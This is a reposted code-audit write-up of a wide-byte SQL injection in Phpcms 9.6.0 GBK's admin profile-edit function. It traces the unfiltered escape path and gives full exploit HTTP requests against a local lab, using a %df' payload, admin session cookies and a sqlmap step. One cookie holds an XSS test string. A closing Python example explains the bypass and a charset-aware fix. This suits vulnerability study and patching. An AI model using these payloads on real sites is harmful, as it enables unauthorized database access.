CMS SQL injection code audit
Audit tools
- seasy source-code audit system
- Phpstudy 8.1.1.2
- Phpcms (9.6.0 GBK)
Audit steps
Phpcms escapes input data by default.
The code audit found one SQL injection caused by insufficient character filtering when user information is updated.
Where user information is updated, the submitted info data is taken directly and passed into the database query.
Searching upward from here shows that the admin_model model is called; next, look up that model.
In admin_model, a model class is instantiated. Look upward for the model class.
The model class defines the basic database operations. Find the update method we need; it in turn calls another class.
Here it can be seen that the db_factory class is called to operate on the database; continue tracing that class.
The db_factory class defines the database connection details and loads a mysql class that runs the query statements.
In mysql_class, find the update method we need. It calls escape_string to filter the input data; search upward for the escape_string method.
In the escape method, the input data receives no filtering at all.
The returned query string is passed to execute and run.
Here the injection can be seen. Because the CMS escapes input automatically by default, the escaping has to be bypassed: the wide-byte method is used to consume the escape character \, that is, %df is used for the bypass.
Injection
Next, set up the environment locally and log in as administrator.
Submit a change to the data. Because the email field has a format check on the front end, capture the request and modify the email value, appending %df' after the email data so that the query reports an error.
Since this is a back-end injection, the administrator's login cookie must be supplied.
Then remove the ', write the request to POST.txt, and use sqlmap for automated injection.
Request that triggers the error message
```http
POST /index.php?m=admin&c=admin_manage&a=public_edit_info HTTP/1.1
Host: 127.0.0.1:8093
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4464.5 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://127.0.0.1:8093
Connection: close
Referer: http://127.0.0.1:8093/index.php?m=admin&c=admin_manage&a=public_edit_info&menuid=972&pc_hash=G9EuRQ
Cookie: PHPSESSID=v0k1udcnitupj9d52qcjjiab74; yzmphp_adminid=07ce0qT4pwrMxE0QioXhznmSqzn9xvX-wS6roZVM; yzmphp_adminname=96f3fyXUcF4vbSOyFlmsmJJ8ZLOiYTC2PyrWgUSuLvZM7L0; yzmphpuserid=95d1JBGLHsq7c_H5MnQCOKOq0aF9Qsx6J2fom0Zu; yzmphp__username=723bYEGbfwpBAAUrcunS5jJfVjXmidic2APVLMMijCPC_w; yzmphpgroupid=0bfe4XTEl4nS-XVAQr92HsD_5dTTBuftMjucTvPF; yzmphp__nickname=ef75MiizaYw-1pOtVKekYUGWSdQVtlCPPu9gvomBbsxMnQ; TffoQ_siteid=333erUtfR7Fe5Jw28wZJETYBElboNmp1ET0UFRpd; TffoQ_admin_email=2d34ilHVoG_P9QUdQNq8FvZ4pqgJDuaull1SYafs0eTQC1quNmRA; TffoQ_sys_lang=98dcWC54M_XkuMYkIEFf5NWMjbi-_1gMJ21AHPTIh6rI3Q; TffoQ_module=d88146WmoR4F0Tv_hzGkNaAxC-GlinO1sIu8pJ2Us0mpGDhk; TffoQ_catid=cb92ksUsFPQ8RwENCVgtODGrZdbqAtEKD7mAZctF; treeview-black=0; sYQDUGqqzHsearch_history=%26quot%26gt%3B%26lt%3BIMG%20SRC%3DA%20onerror%3Dalert%28/xs/%29%26gt%3B%26lt%3B%26quot%7C1%2C1%7C1%2C%26quot%7C1; TffoQ_admin_username=ae3czGm1cWj9M9syw3EdExmONEZuP8cifNhQx22kLeVezks; TffoQ_userid=bb58JlspltYeM05GfmUeeBAOOobm3ebDNML-ut-6; oGHAM_siteid=a4d1a9zqsKRzNCgWRMu9wUSyrPkbjpRAuCJZ-__h; oGHAM_admin_email=9ac3BGQkprHXpx0ieYuguoeT7Hy3EjrfXbm8R8hup6Ecx073IRU; oGHAM_sys_lang=f1b12Ej8rfCmO-sJbOaCStoR0WjaNd91m0QjjuFZ7yIOMQ; VLmUN_admin_username=75284kMEhTsq7wjBD-l1l2kyiL75vi8ni6tCfdbuBOCZU48; VLmUN_siteid=acc4rXwB3hHEcw-coAM-xYe2824cipgGyA6fE-dL; VLmUN_userid=b5b3mf4bydL77FC34TTKRHFXcCZQi5r_8xkohJ5l; VLmUN_admin_email=a60agMFhN7xqheohRH5nKCaqQ6bFId0jOwqb-hmQF-mbAg7gE5Y; VLmUN_sys_lang=8fa0qIbrI3bl3lgF6HJ4jVZsuDWJMW6Eok82-Incda4TrA; VOrQw_admin_username=5f934p_CrF2_PkwMpMfCodD3dvfbWPS7WwU4LYGEFStV-xc; VOrQw_siteid=67ec_Tu3aq37MeFwk3Kgan1FkgJnTKtShq34epex; VOrQw_userid=a4fb7ZyRo25av3MLW4OEfvGlflYmTcipsJC4uunm; VOrQw_admin_email=a979_GifxnWPS-KIS_i0jqtSfmRv0TDSg79rQm7-GDHAh01pUt0; VOrQw_sys_lang=80dfQ-tsnMhqOcFTS_kEPoP5uZU8iuO9p_3C5gcmKEY30Q
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1

info%5Buserid%5D=1&info%5Busername%5D=phpcms&info%5Brealname%5D=123&info%5Bemail%5D=12%4012.com%df'&info%5Blang%5D=zh-cn&dosubmit=%CC%E1%BD%BB&pc_hash=G9EuRQ
```
Injection request
```http
POST /index.php?m=admin&c=admin_manage&a=public_edit_info HTTP/1.1
Host: 127.0.0.1:8093
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4464.5 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://127.0.0.1:8093
Connection: close
Referer: http://127.0.0.1:8093/index.php?m=admin&c=admin_manage&a=public_edit_info&menuid=972&pc_hash=G9EuRQ
Cookie: PHPSESSID=v0k1udcnitupj9d52qcjjiab74; yzmphp_adminid=07ce0qT4pwrMxE0QioXhznmSqzn9xvX-wS6roZVM; yzmphp_adminname=96f3fyXUcF4vbSOyFlmsmJJ8ZLOiYTC2PyrWgUSuLvZM7L0; yzmphpuserid=95d1JBGLHsq7c_H5MnQCOKOq0aF9Qsx6J2fom0Zu; yzmphp__username=723bYEGbfwpBAAUrcunS5jJfVjXmidic2APVLMMijCPC_w; yzmphpgroupid=0bfe4XTEl4nS-XVAQr92HsD_5dTTBuftMjucTvPF; yzmphp__nickname=ef75MiizaYw-1pOtVKekYUGWSdQVtlCPPu9gvomBbsxMnQ; TffoQ_siteid=333erUtfR7Fe5Jw28wZJETYBElboNmp1ET0UFRpd; TffoQ_admin_email=2d34ilHVoG_P9QUdQNq8FvZ4pqgJDuaull1SYafs0eTQC1quNmRA; TffoQ_sys_lang=98dcWC54M_XkuMYkIEFf5NWMjbi-_1gMJ21AHPTIh6rI3Q; TffoQ_module=d88146WmoR4F0Tv_hzGkNaAxC-GlinO1sIu8pJ2Us0mpGDhk; TffoQ_catid=cb92ksUsFPQ8RwENCVgtODGrZdbqAtEKD7mAZctF; treeview-black=0; sYQDUGqqzHsearch_history=%26quot%26gt%3B%26lt%3BIMG%20SRC%3DA%20onerror%3Dalert%28/xs/%29%26gt%3B%26lt%3B%26quot%7C1%2C1%7C1%2C%26quot%7C1; TffoQ_admin_username=ae3czGm1cWj9M9syw3EdExmONEZuP8cifNhQx22kLeVezks; TffoQ_userid=bb58JlspltYeM05GfmUeeBAOOobm3ebDNML-ut-6; oGHAM_siteid=a4d1a9zqsKRzNCgWRMu9wUSyrPkbjpRAuCJZ-__h; oGHAM_admin_email=9ac3BGQkprHXpx0ieYuguoeT7Hy3EjrfXbm8R8hup6Ecx073IRU; oGHAM_sys_lang=f1b12Ej8rfCmO-sJbOaCStoR0WjaNd91m0QjjuFZ7yIOMQ; VLmUN_admin_username=75284kMEhTsq7wjBD-l1l2kyiL75vi8ni6tCfdbuBOCZU48; VLmUN_siteid=acc4rXwB3hHEcw-coAM-xYe2824cipgGyA6fE-dL; VLmUN_userid=b5b3mf4bydL77FC34TTKRHFXcCZQi5r_8xkohJ5l; VLmUN_admin_email=a60agMFhN7xqheohRH5nKCaqQ6bFId0jOwqb-hmQF-mbAg7gE5Y; VLmUN_sys_lang=8fa0qIbrI3bl3lgF6HJ4jVZsuDWJMW6Eok82-Incda4TrA; VOrQw_admin_username=5f934p_CrF2_PkwMpMfCodD3dvfbWPS7WwU4LYGEFStV-xc; VOrQw_siteid=67ec_Tu3aq37MeFwk3Kgan1FkgJnTKtShq34epex; VOrQw_userid=a4fb7ZyRo25av3MLW4OEfvGlflYmTcipsJC4uunm; VOrQw_admin_email=a979_GifxnWPS-KIS_i0jqtSfmRv0TDSg79rQm7-GDHAh01pUt0; VOrQw_sys_lang=80dfQ-tsnMhqOcFTS_kEPoP5uZU8iuO9p_3C5gcmKEY30Q
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1

info%5Buserid%5D=1&info%5Busername%5D=phpcms&info%5Brealname%5D=123&info%5Bemail%5D=12%4012.com%df&info%5Blang%5D=zh-cn&dosubmit=%CC%E1%BD%BB&pc_hash=G9EuRQ
```
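Why the %df' in the request body above defeats byte-level escaping on a GBK connection, and what the fix looks like: an added Python example, not code from the original post or from Phpcms. It models an addslashes-style byte escaper and a MySQL connection in GBK (both assumptions), and takes its input bytes from the captured info[email] value.

```python
"""Why the %df' in the captured request defeats byte-level escaping under a GBK
connection, and how a charset-aware escape closes the gap (added example)."""
from urllib.parse import unquote_to_bytes

# Constructed from the captured body field: info[email]=12%4012.com%df'
EMAIL_BYTES = unquote_to_bytes("12%4012.com%df'")  # b"12@12.com\xdf'"

def addslashes(data: bytes) -> bytes:
    """Charset-unaware escaping: put a backslash before ' " \\ and NUL,
    byte by byte, without regard to multibyte character boundaries."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def quote_is_live(escaped: bytes, charset: str) -> bool:
    """Read the escaped bytes as MySQL would in the given connection charset
    and report whether a single quote survives without a backslash in front."""
    text = escaped.decode(charset, errors="replace")
    i = 0
    while i < len(text):
        if text[i] == "\\":  # a backslash escapes whatever character follows
            i += 2
            continue
        if text[i] == "'":
            return True
        i += 1
    return False

def escape_charset_aware(data: bytes, charset: str = "gbk") -> bytes:
    """The fix: decode in the connection charset first (strict, so a lone lead
    byte such as 0xDF is rejected), escape per character, then re-encode. This
    is what mysqli_real_escape_string does once set_charset() has been called."""
    text = data.decode(charset)
    return "".join("\\" + c if c in "'\"\\\x00" else c for c in text).encode(charset)

def rejects_malformed(data: bytes, charset: str = "gbk") -> bool:
    """True when the charset-aware path refuses the input instead of escaping it."""
    try:
        escape_charset_aware(data, charset)
    except UnicodeDecodeError:
        return True
    return False

if __name__ == "__main__":
    print(quote_is_live(addslashes(EMAIL_BYTES), "gbk"))  # True: 0xDF 0x5C is one GBK char
    print(rejects_malformed(EMAIL_BYTES))                 # True: lone 0xDF is refused
```

In PHP terms the fix is mysqli_set_charset() before escaping, or a prepared statement, so the inserted backslash can never be paired with a stray lead byte.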
- Author: 404test
- Source: 奇安信攻防社区 (QAX Attack and Defense Community)
- Original link: https://forum.butian.net/share/256
- Copyright: Unless otherwise stated, all rights to this article belong to the original author and the publishing platform. Please credit the source when reposting!